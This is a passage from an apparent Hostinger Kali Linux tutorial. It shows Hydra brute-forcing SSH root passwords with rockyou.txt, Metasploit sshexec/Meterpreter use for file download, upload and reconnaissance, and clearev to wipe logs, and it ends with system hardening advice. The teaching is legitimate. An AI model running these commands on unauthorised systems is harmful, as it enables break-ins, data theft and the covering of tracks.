HTTP.<\/p><p>Please note that you must know your target&rsquo;s username to use Hydra effectively. In our case, the default username is <strong>root<\/strong>. Follow these steps:<\/p><p><strong>Extract the wordlist<\/strong><\/p><p>Hydra needs a wordlist because it tries each password on the list until it finds a match. 
Kali Linux includes a popular wordlist, <strong>rockyou.txt<\/strong>, which you can find at:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>If <strong>rockyou.txt.gz<\/strong> is present, extract it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo gunzip \/usr\/share\/wordlists\/rockyou.txt.gz<\/pre><p>This will create the <strong>rockyou.txt<\/strong> file in the same directory.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd85d5d\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"126\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1024x126.png\" alt=\"The rockyou.txt file in the wordlists directory\" class=\"wp-image-119165\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1024x126.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-300x37.png 300w, 
https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-150x18.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-768x94.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-1536x188.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-wordlists-rockyou-txt-highlighted-2048x251.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>However, if the <strong>rockyou.txt.gz<\/strong> file is missing, you need to install the wordlists package:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt install wordlists<\/pre><p>This should install the <strong>rockyou.txt.gz<\/strong> file, and then you can extract it as previously explained.<\/p><p>Alternatively, you can create your custom wordlist if you want a smaller, targeted set of passwords.<\/p><p><strong>Run
Hydra<\/strong><\/p><p>Now that everything&rsquo;s ready, use the following command to brute-force SSH login on your target VPS:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">hydra -l root -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/[target_ip]<\/pre><p>In this command, replace:<\/p><ul class=\"wp-block-list\">\n<li><strong>root<\/strong> &ndash; the actual username you want to test.<\/li>\n\n\n\n<li><strong>\/usr\/share\/wordlists\/rockyou.txt<\/strong> &ndash; the path to your custom wordlist if you use one.<\/li>\n\n\n\n<li><strong>[target_ip]<\/strong> &ndash; your target VPS&rsquo; IP address.<\/li>\n<\/ul><p><strong>Interpret results<\/strong><\/p><p>Hydra will begin testing each password in the wordlist. If there&rsquo;s a successful attempt, Hydra will display it in the terminal, showing which password was correct. 
For example:<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd8637a\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"221\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-hydra-output-1024x221.png\" alt=\"The output of a Hydra brute-forcing attempt\" class=\"wp-image-119166\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-1024x221.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-300x65.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-150x32.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-768x165.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-1536x331.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-hydra-output-2048x441.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>
<\/figure><\/div><p>Remember that brute-forcing can take a few minutes to several days, depending on your wordlist size and the target password&rsquo;s complexity.<\/p><h3 class=\"wp-block-heading\" id=\"h-exploiting-target-systems-with-metasploit\">Exploiting target systems with Metasploit<\/h3><p>As a popular penetration testing tool, Metasploit Framework offers modules to exploit vulnerabilities, test security, deliver payloads, and maintain access to target systems.<\/p><p>Here&rsquo;s how to get started with Metasploit:<\/p><p><strong>Launch Metasploit<\/strong><\/p><p>Open Metasploit by typing:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfconsole<\/pre><p>This will bring up the Metasploit console, where you can search for and execute exploits and payloads.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd86965\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"674\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-1024x674.png\" alt=\"The Metasploit console in the terminal\" class=\"wp-image-119167\"
srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-1024x674.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-300x198.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-150x99.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-768x506.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-1536x1011.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-2048x1348.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p><strong>Search for an exploit<\/strong><\/p><p>Based on what you discovered with Nmap, like open ports and services, search for relevant exploits in Metasploit.
For example, if your target has an SSH service running, search for SSH-related ones:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">search ssh<\/pre><p>Metasploit will return a list of matching exploits that you can use.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd86f13\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"574\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-modules-ssh-1024x574.png\" alt=\"The SSH-related exploits in the Metasploit console\" class=\"wp-image-119168\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-1024x574.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-300x168.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-150x84.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-768x431.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-1536x862.png 1536w, 
https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-modules-ssh-2048x1149.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p><strong>Select and set up an exploit<\/strong><\/p><p>Choose an exploit from the list. For this example, we&rsquo;ll use <strong>sshexec<\/strong>, a module that executes commands on a target system via SSH. This module isn&rsquo;t technically an exploit in the traditional sense; it&rsquo;s a post-authentication tool that requires valid SSH credentials.<\/p><p>Since we already know the target&rsquo;s password after brute-forcing with Hydra, we can use this module to interact with the target.
While it&rsquo;s similar to logging in directly via a terminal, using <strong>sshexec<\/strong> adds more flexibility because it offers some post-exploitation features.<\/p><p>Load the <strong>sshexec<\/strong> module:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">use exploit\/multi\/ssh\/sshexec<\/pre><p>After loading the exploit, check the required options:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">show options<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd875fb\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"376\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1024x376.png\" alt=\"The mandatory PASSWORD and RHOSTS fields for the sshexec module\" class=\"wp-image-119169\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1024x376.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-300x110.png 300w, 
https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-150x55.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-768x282.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-1536x564.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-metasploit-console-sshexec-password-rhosts-highlighted-2048x751.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>Pay attention to mandatory fields with blank values, which indicate that you must set them manually.
In our case, we must set the target IP and password:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">set RHOSTS [target_ip]\n\nset PASSWORD [target_password]<\/pre><p><strong>Interact with the target<\/strong><\/p><p>Once everything is configured, run the exploit:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">run<\/pre><p>This opens a <a href=\"https:\/\/doubleoctopus.com\/security-wiki\/threats-and-tools\/meterpreter\" target=\"_blank\" rel=\"noopener\">Meterpreter<\/a> session, which provides powerful control over the target system. To understand the environment you&rsquo;re working in, start with these commands:<\/p><ul class=\"wp-block-list\">\n<li>Check system information:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sysinfo<\/pre><ul class=\"wp-block-list\">\n<li>Check the current user:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getuid<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd87f15\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"318\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" 
data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1024x318.png\" alt=\"The outputs of sysinfo and getuid commands in Meterpreter\" class=\"wp-image-119170\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1024x318.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-300x93.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-150x47.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-768x239.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output-1536x477.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-sysinfo-getuid-output.png 1616w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/>
<\/figure><\/div><p>Similar to navigating your server, Meterpreter provides commands to interact with the target&rsquo;s file system:<\/p><ul class=\"wp-block-list\">\n<li>List files in the current directory:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ls<\/pre><ul class=\"wp-block-list\">\n<li>Change directories:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/path\/to\/directory<\/pre><ul class=\"wp-block-list\">\n<li>Download a file from the target to your local system:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">download \/path\/to\/target\/file<\/pre><ul class=\"wp-block-list\">\n<li>Upload a file to the target system, such as a script or utility:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">upload \/path\/to\/local\/file<\/pre><p>You can also get details about the target&rsquo;s network connections and interfaces:<\/p><ul class=\"wp-block-list\">\n<li>Show network interfaces:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\"
data-enlighter-group=\"\">ifconfig<\/pre><ul class=\"wp-block-list\">\n<li>Check active network connections using the <a href=\"\/in\/tutorials\/netstat-command\">netstat command<\/a>:<\/li>\n<\/ul><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">netstat<\/pre><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd88770\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"577\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1024x577.png\" alt=\"The outputs of ifconfig and netstat commands in Meterpreter\" class=\"wp-image-119171\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1024x577.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-300x169.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-150x85.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-768x433.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-1536x866.png 1536w, 
https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-meterpreter-ifconfig-netstat-output-2048x1155.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure><\/div><p>When you&rsquo;re done, remember to clean up to avoid leaving traces:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">clearev<\/pre><p>Then, exit the Meterpreter session with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">exit<\/pre><h2 class=\"wp-block-heading\" id=\"h-securing-kali-linux\">Securing Kali Linux<\/h2><p>Using Kali Linux for security tasks means you must prioritize securing your own system because a compromised system could expose sensitive data, disrupt your work, or even be used to launch attacks against others.<\/p><p>Kali Linux follows standard <a href=\"\/in\/tutorials\/vps-security\">Linux VPS security best practices<\/a>, such as:<\/p><p><strong>Update
regularly<\/strong><\/p><p><a href=\"\/in\/tutorials\/how-to-update-kali-linux\">Keeping Kali Linux updated<\/a> is one of the most effective ways to secure it:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update &amp;&amp; sudo apt -y upgrade<\/pre><p>This ensures you have the latest security patches for Kali Linux and all installed tools.<\/p><p><strong>Disable root login<\/strong><\/p><p>Logging in as root over SSH is risky. Instead, create a separate user with sudo privileges:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo adduser &lt;new_user&gt;\n\nsudo usermod -aG sudo &lt;new_user&gt;<\/pre><p>Next, edit the SSH configuration file:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo nano \/etc\/ssh\/sshd_config<\/pre><p>Find the line <strong>PermitRootLogin<\/strong> and set it to <strong>no<\/strong> to disable direct root access via SSH. Save the file, then restart the SSH service:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart ssh<\/pre><p><strong>Use a firewall<\/strong><\/p><p>A firewall limits access to your VPS and blocks unwanted traffic.
Like other distributions, Kali Linux supports <a href=\"\/in\/tutorials\/how-to-configure-firewall-on-ubuntu-using-ufw\">Uncomplicated Firewall (UFW)<\/a>, which is simple to configure.<\/p><p>Install and enable UFW:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install ufw\n\nsudo ufw enable<\/pre><p>Allow only essential services, such as SSH, on your custom port:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw allow 2222\/tcp<\/pre><p>Make sure this port matches the one your SSH daemon listens on; otherwise, new SSH connections will be blocked. You can adjust the rules based on other services you plan to run. Once done, check the firewall status:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo ufw status<\/pre><p><strong>Install Fail2Ban<\/strong><\/p><p><a href=\"\/in\/tutorials\/fail2ban-configuration\">Fail2Ban<\/a> monitors logs and automatically blocks IP addresses with suspicious activity, such as repeated failed login attempts. Install it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install fail2ban<\/pre><p>Fail2Ban is configured to protect SSH by default, but you can adjust its settings in <strong>\/etc\/fail2ban\/jail.conf<\/strong> to monitor other services.
Restart Fail2Ban after making changes:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo systemctl restart fail2ban<\/pre><p><strong>Limit sudo permissions<\/strong><\/p><p>For any additional users you add, restrict their sudo privileges to only the necessary commands. Use the <a href=\"\/in\/tutorials\/sudo-and-the-sudoers-file\">visudo command<\/a> to configure sudo permissions carefully:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo visudo<\/pre><p>This lets you specify exactly which commands each user can run with sudo.<\/p><h2 class=\"wp-block-heading\" id=\"h-conclusion\">Conclusion<\/h2><p>In this tutorial, we&rsquo;ve covered the fundamentals of using Kali Linux for security purposes. We&rsquo;ve described how to access your Kali Linux environment, run essential commands, manage specialized tools, and perform assessments using Nmap, Hydra, and Metasploit.<\/p><p>We also highlighted the importance of securing your own Kali Linux system by updating regularly, disabling root login, and configuring tools like a firewall and Fail2Ban.<\/p><p>Kali Linux has hundreds of tools for penetration testing, vulnerability assessment, and network discovery. Keep exploring its capabilities to deepen your cybersecurity skills. If you have questions or want to share your experience with Kali Linux, feel free to use the comment box below.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As a security-focused operating system, Kali Linux lets you perform various tasks, such as penetration testing, digital forensics, and network analysis.
With hundreds of security tools, Kali Linux is ideal for cybersecurity specialists and enthusiasts looking to expand their skills. If you&rsquo;re interested in using Kali Linux but unsure where to start, you&rsquo;re in the [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"\/in\/tutorials\/kali-linux-tutorial\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":411,"featured_media":129402,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"rank_math_title":"Kali Linux tutorial: Manage tools and run security tests","rank_math_description":"Learn how to use Kali Linux, from accessing your environment to managing tools, performing security tests, and protecting your system.","rank_math_focus_keyword":"kali linux tutorial","footnotes":""},"categories":[22640],"tags":[],"class_list":["post-119150","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vps"],"hreflangs":[{"locale":"en-US","link":"https:\/\/www.hostinger.com\/tutorials\/kali-linux-tutorial","default":0},{"locale":"fr-FR","link":"https:\/\/www.hostinger.com\/fr\/tutoriels\/tutoriel-kali-linux","default":0},{"locale":"es-ES","link":"https:\/\/www.hostinger.com\/es\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"en-UK","link":"https:\/\/www.hostinger.com\/uk\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-MY","link":"https:\/\/www.hostinger.com\/my\/tutorials\/how-to-set-up-shipping-in-woocommerce-14","default":0},{"locale":"en-PH","link":"https:\/\/www.hostinger.com\/ph\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-IN","link":"https:\/\/www.hostinger.com\/in\/tutorials\/kali-linux-tutorial","default":0},{"locale":"en-CA","link":"https:\/\/www.hostinger.com\/ca\/tutorials\/kali-linux-tutorial","default":0},{"locale":"es-AR","link":"https:\/\/www.hostinger.com\/ar\/tutoriales\/tutorial-kali-linux","default":0},{"locale":"es-MX","link":"https:\/
